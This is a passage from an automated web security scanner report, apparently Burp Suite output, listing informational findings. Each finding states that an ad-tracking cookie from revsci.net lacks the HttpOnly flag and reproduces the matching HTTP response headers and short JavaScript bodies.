Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSMLHT2uikdn5vw/ZUsicc4VPat72X0BRE3fm6MNJiHGaKzb2aFbVjI59eif+fODfjX2iW0xsqMOMfyrrcddIMSklF+GlzYMSmLreI5Zy/GeW6vDj+wWQEAWvERCASNKUW1ejPcGmrIUMmJ/opLuXBEJqalRFyzz++kuS0t8FA35bmxx0Va9Cw8fcNBWphT6vuj41246c95NOaRAsl5hE/ZCrN9ltl638OMRjh6IkR46+Bn0HQbdSGKwzcO04+CyXwJk4Hw4YSr349H0jhzHFve3eZs4bvQZgRVZoV6WmyP4pc8FRRloHN3+orJACrVeeEz550D1q6YfT09jcb17LPDX8fRNzIxBY9d58s8KWjBNmXwVXJJ7UHisDFf9Ey7Ms7Wr2plDqEMX6bjjECP++dzpXLEjq+VGlvjNs1C2NYn//UK1d0sLFeGRAwP30BeDDG9nGG8OAncZJxK/3iMf/qG1fOQh11zX5a4KeTBQK17RFxsTNh2j2fKLpXHqWExgWzJQhuIp3yPqX/iP0Fdb1X0mccqxQ1tIULcMXty6FxRR2tEUdD/lOGzmw1dAxjKLqWZViDH+nw9VjH2eHWq1baas761ofPzSk/CbXGLKG0KjU+ETCo0d1J28pAv0u; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 19:14:08 GMT; Path=/
X-Proc-ms: 1
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 19:14:07 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.239. http://pix04.revsci.net/I10985/b3/0/3/1008211/8734315.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/8734315.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXrNTCDRfrnhu4IU3vheM/Ns0vAjloMpK61eCPNQGTGFQ+Pxc0KjW0Xlx9X5zeVCOktMritE+GyIPrHmh/wJI9G0tz6rWCDZsNyLhfOjYs28Ifi7ZK7k5SPLCKDg5LCkkMizjb8d5LjjS3L2gH8oCROKAdneR4EgIKBwgNnoUm8k/Iwbc5r4m8aYFMryjeoiMTlzQ7R2IFcY8Q30Ro53whtEoiH/Bu+WoyryZgtVlkCSLPEeefZrCBZbLrD+//8WqGERGMitWzex0mmzhlaVCaVmQgGOu46YSaKRUQ0m04HBV+KheQbSZlO5VtneOe+StGD9+RalRkrNLXKMMvqWaSv8TRCG1D23sVtFUKOWM85Cnas1iLS00ItR9yFTE/YWVXwG8UEUWK6CycJoz/7KbnOhrHto9JqDJvhMs6FmQ0ENl89++0guMuHAlbFtC4wwyRY4jihicDrrCYF+k7q0ssXibS5dierQ3j1ZXKxMZzp/L/jHd3g5EGlKNNxlOCT2gANBCaNF4nxnLcvPGiAYgi31Y7w7LAcd54UboJwOyvd/b2G8gW+FwhJ9O9HheorekzuAHP3E0sGIJNSzXCqG+Cczq3niWiSdKMMf7cYPXO77Hb8jwL0YYOxDUE0SwQ==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:34:42 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vz47ssdu65JwXrNTCDRfrnhu4IU3vheM/Ns0vAjloMpK61eCPNQGTGFQ+Pxc0KjW0Xlx9X5zeVCOktMritE+GyIPrHmh/wJI9G0tz6rWCDZsNyLhfOjYs28Ifi7ZK7k5SPLCKDg5LCkkMizjb8d5LjjS3L2gH8oCROKAdneR4EgIKBwgNnoUm8k/Iwbc5r4m8aYFMryjeoiMTlzQ7R2IFcY8Q30Ro53whtEoiH/Bu+WoyryZgtVlkCSLPEeefZrCBZbLrD+//8WqGERGMitWzex0mmzhlaVCaVmQgGOu46YSaKRUQ0m04HBV+KheQbSZlO5VtneOe+StGD9+RalRkrNLXKMMvqWaSv8TRCG1D23sVtFUKOWM85Cnas1iLS00ItR9yFTE/YWVXwG8UEUWK6CycJoz/7KbnOhrHto9JqDJvhMs6FmQ0ENl89++0guMuHAlbFtC4wwyRY4jihicDrrCYF+k7q0ssXibS5dierQ3j1ZXKxMZzp/L/jHd3g5EGlKNNxlOCT2gANBCaNF4nxnLcvPGiAYgi31Y7w7LAcd54UboJwOyvd/b2G8gW+FwhJ9O9HheorekzuAHP3E0sGIJNSzXCqG+Cczq3niWiSdKMMf7cYPXO77Hb8jwL0YYOxDUE0SwQ==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 14:34:42 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 14:34:42 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.240. http://pix04.revsci.net/I10985/b3/0/3/1008211/896562366.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/896562366.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rsB4rOfq5QuYXLnKYyViGymJW18v6pxo9TQQ/CMgK6G8jF0H/wC6LifrWDbWiI6t+ib4fuctjH0iWzAw3r14JwP/YYUQ4WilEZa1mDBgWbOLLoFbDs08LFTYab0cAaYOpnwIMBLA0IVDPklGA4cG8987irB0kMgiihI/CdBBO2IqsXUHg2YYHfbCkyKF/JXks5u+heEvi341VI6cB5NWitPCMF79O9TY2r/1wMDRcxar0dCcOUA19iyGVNLDYDF86x87PdcgYejEsUMdc2duPgOIx4rC7FyfGZpR7epenDDvIYvU27qvwht6FQASYws3bEqTCb6mh0vFu5mv8ReFLS8QXn+IWxW7m5aAgGHm2bnArmy/4uwEVzAZjnz24jkctfnC4A0VAac2LfKNp8W5jT8vmBdwMvqFHxSlTsD0Kux9KykoJaPynhziwgDG6HPOPmv1RQG6jr4x5rAcBTMD+mTBWcemEZbFGGLDECy+LTFTwX48tMHCQtqJHmvfXKSJqSmaZfSJNT0KjhPHsowPx4UlxsgpWDUNgaFA4bycN5/BS3Q9yH+j7P99D2ro1KG/8HAzxoqTZa9cIyBFViRuBpETRngEAkIHFvjISsC/NlRFmF89GpPKG9QLdIB4xAvr2lY7fC7DH/GHCA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 11:28:25 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rsB4rOfq5QuYXLnKYyViGymJW18v6pxo9TQQ/CMgK6G8jF0H/wC6LifrWDbWiI6t+ib4fuctjH0iWzAw3r14JwP/YYUQ4WilEZa1mDBgWbOLLoFbDs08LFTYab0cAaYOpnwIMBLA0IVDPklGA4cG8987irB0kMgiihI/CdBBO2IqsXUHg2YYHfbCkyKF/JXks5u+heEvi341VI6cB5NWitPCMF79O9TY2r/1wMDRcxar0dCcOUA19iyGVNLDYDF86x87PdcgYejEsUMdc2duPgOIx4rC7FyfGZpR7epenDDvIYvU27qvwht6FQASYws3bEqTCb6mh0vFu5mv8ReFLS8QXn+IWxW7m5aAgGHm2bnArmy/4uwEVzAZjnz24jkctfnC4A0VAac2LfKNp8W5jT8vmBdwMvqFHxSlTsD0Kux9KykoJaPynhziwgDG6HPOPmv1RQG6jr4x5rAcBTMD+mTBWcemEZbFGGLDECy+LTFTwX48tMHCQtqJHmvfXKSJqSmaZfSJNT0KjhPHsowPx4UlxsgpWDUNgaFA4bycN5/BS3Q9yH+j7P99D2ro1KG/8HAzxoqTZa9cIyBFViRuBpETRngEAkIHFvjISsC/NlRFmF89GpPKG9QLdIB4xAvr2lY7fC7DH/GHCA==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 11:28:25 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 11:28:24 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.241. http://pix04.revsci.net/I10985/b3/0/3/1008211/91490024.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/91490024.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zBS05ZbNqmtVtCSg/DW3ynPdQrdHYXITnLz/IiEU9rR8N/1SuCaDDvg1EUapckrs+3gdo8WydaJam0v6uuE6KEHUTf/VrJfYQc8j7ixrfHU9uQwGvSCJr1cxZBHXcOJ+SkWGWZAc2YuZYNSgUDe3KuNqCoyvEkOfiLGwhwOlW2A2Iz0fG7TaF72idj+/rLuiklM7PR6nyU9dux2RNNY=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:17:04 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWlHQGXxBES5q3SQW4zBS05ZbNqmtVtCSg/DW3ynPdQrdHYXITnLz/IiEU9rR8N/1SuCaDDvg1EUapckrs+3gdo8WydaJam0v6uuE6KEHUTf/VrJfYQc8j7ixrfHU9uQwGvSCJr1cxZBHXcOJ+SkWGWZAc2YuZYNSgUDe3KuNqCoyvEkOfiLGwhwOlW2A2Iz0fG7TaF72idj+/rLuiklM7PR6nyU9dux2RNNY=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:17:04 GMT; Path=/
X-Proc-ms: 4
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 18:17:04 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.242. http://pix04.revsci.net/I10985/b3/0/3/1008211/922092432.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/922092432.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOheQIMpzaxu2F29/z47ssdu65JwdrFTCDRvsJSum2Nh/OoReJg2v9kDss6IjP7s8e9ziqupcY9YN6TjgPN/URf2EAYz+5gw6zw3vuST7p/TekuKQlkFzcEhmWSCCDZ+JZoqdYPR9buIQNe+1g/DwtERBSEZfzzKXV5RK/jWqBqeswgoo7pnibg6V7tJYgzNCqdbpw77QHRUtHFFnoVz91fCrKVSnd9KdSI3Z1WahAqH5m27RALV8jDVWQaOEfRhYIjecdIQm2Jh608+l09rXwXl7KXIogFmw8aSrm8tn3nWCLh+89ja0R4BdOrZ8eyZFE7ZBmJRKxDA0kkJ4VkxqjiDfiz/AuG536ioPjM2e/VPdv5MO6LldoQ7YCGnE4nkIm1S1uPirRLgHwicwZ7k0Xo9Bu27oUNMN4etcOEMfd5g9PVLIhPNAtI5fhGnhUlnq8MBu6R9P4hNxJSXnfe7x45/8rVbybSV5hEhy2rgMD1o6Ktudn8TBRShFizzdc/eT4sHL9fb/4r51E9H0gB25/A8UlI6X4flClOOAeXVY0HbRv1Vt9i9ovrbpE5qwoH6eAzoa5ID3vPC2Z56fU5gh/CZ9optArH+ZVXeEyXpPm8m/PM1sRrq+5E2UOo2EzHfA4AZ5A2k/FgE6FJQ3GtNNk=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:35:37 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOheQIMpzaxu2F29/z47ssdu65JwdrFTCDRvsJSum2Nh/OoReJg2v9kDss6IjP7s8e9ziqupcY9YN6TjgPN/URf2EAYz+5gw6zw3vuST7p/TekuKQlkFzcEhmWSCCDZ+JZoqdYPR9buIQNe+1g/DwtERBSEZfzzKXV5RK/jWqBqeswgoo7pnibg6V7tJYgzNCqdbpw77QHRUtHFFnoVz91fCrKVSnd9KdSI3Z1WahAqH5m27RALV8jDVWQaOEfRhYIjecdIQm2Jh608+l09rXwXl7KXIogFmw8aSrm8tn3nWCLh+89ja0R4BdOrZ8eyZFE7ZBmJRKxDA0kkJ4VkxqjiDfiz/AuG536ioPjM2e/VPdv5MO6LldoQ7YCGnE4nkIm1S1uPirRLgHwicwZ7k0Xo9Bu27oUNMN4etcOEMfd5g9PVLIhPNAtI5fhGnhUlnq8MBu6R9P4hNxJSXnfe7x45/8rVbybSV5hEhy2rgMD1o6Ktudn8TBRShFizzdc/eT4sHL9fb/4r51E9H0gB25/A8UlI6X4flClOOAeXVY0HbRv1Vt9i9ovrbpE5qwoH6eAzoa5ID3vPC2Z56fU5gh/CZ9optArH+ZVXeEyXpPm8m/PM1sRrq+5E2UOo2EzHfA4AZ5A2k/FgE6FJQ3GtNNk=; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 17:35:37 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 17:35:37 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.243. http://pix04.revsci.net/I10985/b3/0/3/1008211/927091024.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/927091024.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSMKHIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZqR/m2ALq/mgP8FM+30dy40QSDpwLrthfKiUP6P4TijfFwc9SHbiJHg5KCkMjIzvI8dojLR2aXr8d5i6C8C7VgxY4ijIND8cny1zngi5AgmUy2z3/C1RtyfVlec6iWQoD5RrbNNlPzPL78P032FovR52TDX4bbBht4iLV99zjM1TiAiY5dXdsfxZwfROTF2lExlY5co5vKxth5EPCFb+XoGIP0tVD7NiqIRueCQModtcUOmdPzeji5tOQYFqP4WgwneVYXwmxZEzIuiRvtpCC6vEFBTtl/cqtRkjylQljZ2RzJAkbWrRui4RxWmVp4bbzRBIzh3TZTIO0lsHu0dNaDSUq2DDyTtVMxv1GD+fRdypn0r9bsjU3U00i6gpdCzJdBCfEQ6Rya6TrmK9MWKnC9FMO0N+rbJbO9GXkyZ9/JI9p102eUI7O1KiczN5QSIk0ZtC1Vx48kZ8cr+Tc/tbEwdirTluoYboJwOwvN/T20jBOLDdfRZmtFRKJIyzjiAHKnQO/wyFnhbIBP+Tokd9N3g785XpchwOSTNEkg72LuQq7hJcU9XoP09; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:57:24 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSMKHIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZqR/m2ALq/mgP8FM+30dy40QSDpwLrthfKiUP6P4TijfFwc9SHbiJHg5KCkMjIzvI8dojLR2aXr8d5i6C8C7VgxY4ijIND8cny1zngi5AgmUy2z3/C1RtyfVlec6iWQoD5RrbNNlPzPL78P032FovR52TDX4bbBht4iLV99zjM1TiAiY5dXdsfxZwfROTF2lExlY5co5vKxth5EPCFb+XoGIP0tVD7NiqIRueCQModtcUOmdPzeji5tOQYFqP4WgwneVYXwmxZEzIuiRvtpCC6vEFBTtl/cqtRkjylQljZ2RzJAkbWrRui4RxWmVp4bbzRBIzh3TZTIO0lsHu0dNaDSUq2DDyTtVMxv1GD+fRdypn0r9bsjU3U00i6gpdCzJdBCfEQ6Rya6TrmK9MWKnC9FMO0N+rbJbO9GXkyZ9/JI9p102eUI7O1KiczN5QSIk0ZtC1Vx48kZ8cr+Tc/tbEwdirTluoYboJwOwvN/T20jBOLDdfRZmtFRKJIyzjiAHKnQO/wyFnhbIBP+Tokd9N3g785XpchwOSTNEkg72LuQq7hJcU9XoP09; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 15:57:24 GMT; Path=/
X-Proc-ms: 6
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 15:57:23 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.244. http://pix04.revsci.net/I10985/b3/0/3/1008211/92794223.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/92794223.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWoZUQSG9hlG1bae3RCnDYdyPQRhCrxtrzkP3d14d3S5w0mtMH2weQSGYPTNWz9C1DH9tRfjw4t7jgY8E1Syo1RXJ3j/iiKhEBH6CcFOAsZTHyGci6z08ra07WZZuavu0gC4rxNnZ3nu/7w3rzBduHuYcjb1soyILRWKIS+7LyZ7TmE7e99bDIS7fGQBwxkT6ha934b0MUwGC7gJSChwg8lZOmUN8MQxPagP0x; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:27:25 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5MOhOXMMpzaBv3Bh9uz8rvh2rOfqkHGdHHnLYyViGymJW18v6pxo9TQQ/CMgK6G8jF0HnU6SSkHFIHZYBIkHWaCW/4z8aSiyg0TBnt14JwP+YaUQ4WilEZa1mbBjW7OLLoFHNs08LFTYabxkEEVPU2c06DjOYyj3SuXjsHKw1HvrO7ZFiKShbeX4nTABONWLPoErccRrS7uZVBYf4XW1pSftKp6homnlrYgI1lp22zIsyNkdhnVKrDbFyV2uJv/1BmUlBKwDFWqjTCpvCBZbLtKKzv6WltjQ7pWUjMNH+30I2YuP5FFcJfLwMN3eawf2+KLTThx0xTTlYHzawZQXdaHyUF1KXX9ZUQI1rnykVwY0b8NIDFThSHpzPg/1KsPTtEbccXni5KjMfY2uitH8+9UVMO+wju4WEeuZFr4ZxtKSPrxl9yaWoZUQSG9hlG1bae3RCnDYdyPQRhCrxtrzkP3d14d3S5w0mtMH2weQSGYPTNWz9C1DH9tRfjw4t7jgY8E1Syo1RXJ3j/iiKhEBH6CcFOAsZTHyGci6z08ra07WZZuavu0gC4rxNnZ3nu/7w3rzBduHuYcjb1soyILRWKIS+7LyZ7TmE7e99bDIS7fGQBwxkT6ha934b0MUwGC7gJSChwg8lZOmUN8MQxPagP0x; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 18:27:25 GMT; Path=/
X-Proc-ms: 2
P3P: policyref="http://js.revsci.net/w3c/rsip3p.xml", CP="NON PSA PSD IVA IVD OTP SAM IND UNI PUR COM NAV INT DEM CNT STA PRE OTC HEA"
Server: RSI
Cache-Control: no-cache
Pragma: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
Content-Type: application/javascript;charset=UTF-8
Content-Length: 145
Date: Thu, 16 Jun 2011 18:27:24 GMT

/* Vermont 12.4.0-1262 (2011-05-26 11:09:14 UTC) */
rsinetsegs = [];
if(typeof(DM_onSegsAvailable)=="function"){DM_onSegsAvailable([],'i10985');}

11.245. http://pix04.revsci.net/I10985/b3/0/3/1008211/944603151.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pix04.revsci.net
Path:	/I10985/b3/0/3/1008211/944603151.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6Wk9GL9HmpbJCCrFaeDS5h0D0WIolggMv/fNJOWq0vntsKGDBzKGBsUdIzcN0mSr75VwD603UY3u6ShdsaYshJs6U8VJLKvVmlbKyEmmB+L2lp9JqHsvRLqgLOl5XDKKRoQc/UBmorHEc/TIHBJFRVSZrobvtLMxEgZPYyKL0er8BWtYtV0dLN3aZo9p/px9SgBpbFrXxLEX1SLYZqrvcnVFUo3g64nONjUn/o+bNWHlXC6/gyl3syAq1j4FvExFWoTXBQ+1cB2yKM4hO2SOJ36fEeirt82DeCpboe+cnD9JZgSt6tgdDD7qFfWLRUPk7U7uupp/Vn4Q==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:14:53 GMT; Path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
Set-Cookie: rsi_segs_1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs__1000000=; Domain=.revsci.net; Expires=Thu, 01-Jan-1970 00:00:10 GMT; Path=/
Set-Cookie: rsi_segs_1000000=pUPF5EOhOAMMpzaxu2F29vyoS4ORGuZbSAKCIGSNrjQ0ubO+9Micc4VPat72X0BRE3fmuDUz/xw+ppzybIZwKwagY0WUnYiGBkFQqZouM+GZBQjkw/QKBeEE1wCXGHaX6NeLZFDnb808OczVZi/z1C2nYHyKGCe5170OipKEEqzGL9GHYz69OROKA+nYQRc07zJ3P+vzvxbMCdraiyFAw8fcNBWphT6vuk41246c95NOaRIsl5hE/ZCrN9ltl638ONtjh6IkR4C+Bn0HQU9SGKwzcG0oLUmfYwfR+/e01trCzWnlOqoD+91j7ecB5h6As6cGZTiUkAQV8S6Wk9GL9HmpbJCCrFaeDS5h0D0WIolggMv/fNJOWq0vntsKGDBzKGBsUdIzcN0mSr75VwD603UY3u6ShdsaYshJs6U8VJLKvVmlbKyEmmB+L2lp9JqHsvRLqgLOl5XDKKRoQc/UBmorHEc/TIHBJFRVSZrobvtLMxEgZPYyKL0er8BWtYtV0dLN3aZo9p/px9SgBpbFrXxLEX1SLYZqrvcnVFUo3g64nONjUn/o+bNWHlXC6/gyl3syAq1j4FvExFWoTXBQ+1cB2yKM4hO2SOJ36fEeirt82DeCpboe+cnD9JZgSt6tgdDD7qFfWLRUPk7U7uupp/Vn4Q==; Domain=.revsci.net; Expires=Fri, 15-Jun-2012 13:14:53 GMT; Path=/
X-Proc-ms: 1
